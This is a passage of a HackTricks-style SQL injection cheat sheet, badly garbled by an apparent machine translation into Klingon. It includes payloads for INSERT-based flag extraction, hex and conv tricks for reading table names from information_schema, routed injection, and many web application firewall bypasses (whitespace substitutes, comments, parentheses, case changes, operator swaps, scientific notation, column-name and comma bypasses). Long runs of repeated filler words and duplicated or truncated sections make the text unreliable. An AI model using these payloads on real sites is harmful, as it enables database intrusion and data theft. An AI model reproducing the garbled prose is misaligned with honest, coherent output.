vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh
```
SQLi payload:
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -

A new user with username=otherUsername, password=otherPassword, email:FLAG will be created
```
#### ʼejwIʼ Decimal qoj

ghaHvaD technique vItlhutlh. 1 account yInIDnISmoʼ. ʼej **hex2dec** ʼej **substr** vIleghlaH.
```sql
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```
To get the text you can use:

```
tlhIngan Hol
```

or

```
Klingon
```

to specify the language.
```python
__import__('binascii').unhexlify(hex(215573607263)[2:])
```
**Hex** and **replace** (and **substr**) **ghItlh** vaj **ghItlh** (je **substr**) **DIvI'**:

```sql
SELECT hex(column_name) FROM table_name;
SELECT replace(column_name, 'string_to_replace', 'replacement_string') FROM table_name;
SELECT substr(column_name, start_position, length) FROM table_name;
```

**Hex** and **replace** (and **substr**) **ghItlh** vaj **ghItlh** (je **substr**) **DIvI'**:

```sql
SELECT hex(column_name) FROM table_name;
SELECT replace(column_name, 'string_to_replace', 'replacement_string') FROM table_name;
SELECT substr(column_name, start_position, length) FROM table_name;
```
```sql
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.

{% embed url="https://www.rootedcon.com/" %}

## Routed SQL injection

Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output. ([From Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))

Example:
```
#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
```
## WAF Bypass

[Initial bypasses from here](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass)

### No spaces bypass

No Space (%20) - bypass using whitespace alternatives

### Klingon Translation:

## WAF Bypass

[Initial bypasses from here](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass)

### No spaces bypass

No Space (%20) - bypass using whitespace alternatives
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```
## No Whitespace - bypass using comments

### Description

In some cases, web applications may filter or block certain characters or keywords to prevent SQL injection attacks. One common technique is to block whitespace characters, such as spaces and tabs. However, this can be bypassed using comments in SQL queries.

### Exploitation

To bypass the whitespace filter, you can use SQL comments to hide the injected code. In SQL, comments are denoted by `--` for single-line comments and `/* */` for multi-line comments.

For example, consider the following vulnerable query:

```sql
SELECT * FROM users WHERE username = 'admin' AND password = 'password'
```

To inject a malicious payload, you can use comments to hide the additional code:

```sql
SELECT * FROM users WHERE username = 'admin'--' AND password = 'password'
```

In this example, the injected payload `'--'` comments out the rest of the original query, effectively bypassing the password check.

### Prevention

To prevent this type of attack, it is important to implement proper input validation and parameterization techniques. Additionally, consider using a web application firewall (WAF) that can detect and block SQL injection attempts.

### References

- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
```sql
?id=1/*comment*/and/**/1=1/**/--
```
## No Whitespace - bypass using parenthesis

### Description

In some cases, a web application may filter or block certain characters, such as whitespace, to prevent SQL injection attacks. However, it is still possible to bypass these filters by using parenthesis.

### Exploit

To exploit this vulnerability, you can use the following technique:

1. Identify a vulnerable parameter in the web application.
2. Craft a SQL injection payload using parenthesis to bypass the whitespace filter.
3. Inject the payload into the vulnerable parameter and observe the application's response.

### Example

Suppose we have a vulnerable parameter called `id` in a URL, and the application filters out whitespace characters. We can bypass this filter by using parenthesis to separate the SQL keywords.

Original URL: `https://example.com/page?id=1`

Payload: `1) UNION SELECT 1,2,3--`

Modified URL: `https://example.com/page?id=1) UNION SELECT 1,2,3--`

In this example, the closing parenthesis `)` separates the injected SQL keywords from the original query, allowing us to execute the UNION SELECT statement despite the whitespace filter.

### Prevention

To prevent this type of attack, it is essential to implement proper input validation and parameterized queries. Additionally, consider using a web application firewall (WAF) to detect and block SQL injection attempts.
```sql
?id=(1)and(1)=(1)--
```
### ghItlhvam: ghItlhvam lo'wI' jatlh

ghItlhvam lo'wI' jatlh - OFFSET, FROM je JOIN lo'wI' jatlh
```
LIMIT 0,1         -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
```
### Generic Bypasses

**tlhIngan Hol translation:**

**QaDmoHwI'**

**QaDmoHwI' vItlhutlh - vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhut
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```
## Blacklist using keywords case insensitive - bypass using an equivalent operator

### tlhIngan Hol Translation:

## Blacklist using keywords case insensitive - bypass using an equivalent operator

### Markdown:
```
## Blacklist using keywords case insensitive - bypass using an equivalent operator
```
```
AND   -> && -> %26%26
OR    -> || -> %7C%7C
=     -> LIKE,REGEXP,RLIKE, not < and not >
> X   -> not between 0 and X
WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))
```
### Scientific Notation WAF bypass

You can find a more in depth explaination of this trick in [gosecure blog](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/).\
Basically you can use the scientific notation in unexpected ways for the WAF to bypass it:

### qulDajtaHvIS not'a' QaD

[gosecure blog](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/) Daq yIlo'laHbe'chugh, 'ej vItlhutlhlaHbe'chugh.\
WAF qulDajtaHvIS not'a' QaD, qulDajtaHvIS not'a' QaD vItlhutlhlaHbe'chugh:
```
-1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1
' or 1.e('')=
```
### Bypass Column Names Restriction

First of all, notice that if the **original query and the table where you want to extract the flag from have the same amount of columns** you might just do: `0 UNION SELECT * FROM flag`

It’s possible to **access the third column of a table without using its name** using a query like the following: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, so in an sqlinjection this would looks like:

### ʼejnISmeymey QaQmey

ghItlhvam, **ghItlhvam vItlhutlh 'ej vItlhutlh qaStaHvIS flag vItlhutlhDaq vItlhutlhDaq qaStaHvIS columns** vaj vaj vItlhutlh: `0 UNION SELECT * FROM flag`

**vItlhutlhDaqDaq vItlhutlhDaqDaq vItlhutlhDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaqDaq
```bash
# This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
```
**vaj comma bypass** vItlhutlh.
```bash
# In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
-1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c
```
This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/](https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/)

### WAF bypass suggester tools

{% embed url="https://github.com/m4ll0k/Atlas" %}

## Other Guides

* [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)

## Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %}


<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.

{% embed url="https://www.rootedcon.com/" %}

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>